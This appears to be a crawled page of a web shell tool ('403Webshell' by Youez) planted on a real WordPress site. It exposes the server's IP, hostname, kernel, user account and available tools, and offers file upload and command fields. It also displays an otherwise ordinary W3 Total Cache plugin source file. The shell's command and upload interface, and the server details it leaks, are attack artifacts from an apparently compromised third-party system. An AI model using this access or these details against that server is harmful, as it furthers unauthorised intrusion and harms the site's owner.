403Webshell
Server IP : 202.61.199.114  /  Your IP : 216.73.217.139
Web Server : nginx/1.22.1
System : Linux de.arni-solutions.de 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : web20 ( 1018)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/clients/client2/web19/web/wp-content/plugins/w3-total-cache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/clients/client2/web19/web/wp-content/plugins/w3-total-cache/DbCache_Plugin_Admin.php
<?php
namespace W3TC;

class DbCache_Plugin_Admin {
	function run() {
		$config_labels = new DbCache_ConfigLabels();
		add_filter( 'w3tc_config_labels', array( $config_labels, 'config_labels' ) );

		$c = Dispatcher::config();
		if ( $c->get_boolean( 'dbcache.enabled' ) ) {
			add_filter( 'w3tc_usage_statistics_summary_from_history', array(
					$this, 'w3tc_usage_statistics_summary_from_history' ), 10, 2 );
			add_filter( 'w3tc_errors', array( $this, 'w3tc_errors' ) );
		}
	}



	public function w3tc_usage_statistics_summary_from_history( $summary, $history ) {
		// memcached servers
		$c = Dispatcher::config();
		if ( $c->get_string( 'dbcache.engine' ) == 'memcached' ) {
			$summary['memcached_servers']['dbcache'] = array(
				'servers' => $c->get_array( 'dbcache.memcached.servers' ),
				'username' => $c->get_string( 'dbcache.memcached.username' ),
				'password' => $c->get_string( 'dbcache.memcached.password' ),
				'name' => __( 'Database Cache', 'w3-total-cache' )
			);
		} elseif ( $c->get_string( 'dbcache.engine' ) == 'redis' ) {
			$summary['redis_servers']['dbcache'] = array(
				'servers' => $c->get_array( 'dbcache.redis.servers' ),
				'username' => $c->get_boolean( 'dbcache.redis.username' ),
				'dbid' => $c->get_integer( 'dbcache.redis.dbid' ),
				'password' => $c->get_string( 'dbcache.redis.password' ),
				'name' => __( 'Database Cache', 'w3-total-cache' )
			);
		}


		// counters
		$dbcache_calls_total = Util_UsageStatistics::sum( $history,
			'dbcache_calls_total' );
		$dbcache_calls_hits = Util_UsageStatistics::sum( $history,
			'dbcache_calls_hits' );

		$summary['dbcache'] = array(
			'calls_total' => Util_UsageStatistics::integer(
				$dbcache_calls_total ),
			'calls_per_second' => Util_UsageStatistics::value_per_period_seconds(
				$dbcache_calls_total, $summary ),
			'hit_rate' => Util_UsageStatistics::percent(
				$dbcache_calls_total, $dbcache_calls_total )
		);

		return $summary;
	}



	public function w3tc_errors( $errors ) {
		$c = Dispatcher::config();

		if ( $c->get_string( 'dbcache.engine' ) == 'memcached' ) {
			$memcached_servers = $c->get_array( 'dbcache.memcached.servers' );

			if ( !Util_Installed::is_memcache_available( $memcached_servers ) ) {
				if ( !isset( $errors['memcache_not_responding.details'] ) )
					$errors['memcache_not_responding.details'] = array();

				$errors['memcache_not_responding.details'][] = sprintf(
					__( 'Database Cache: %s.', 'w3-total-cache' ),
					implode( ', ', $memcached_servers ) );
			}
		}

		return $errors;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit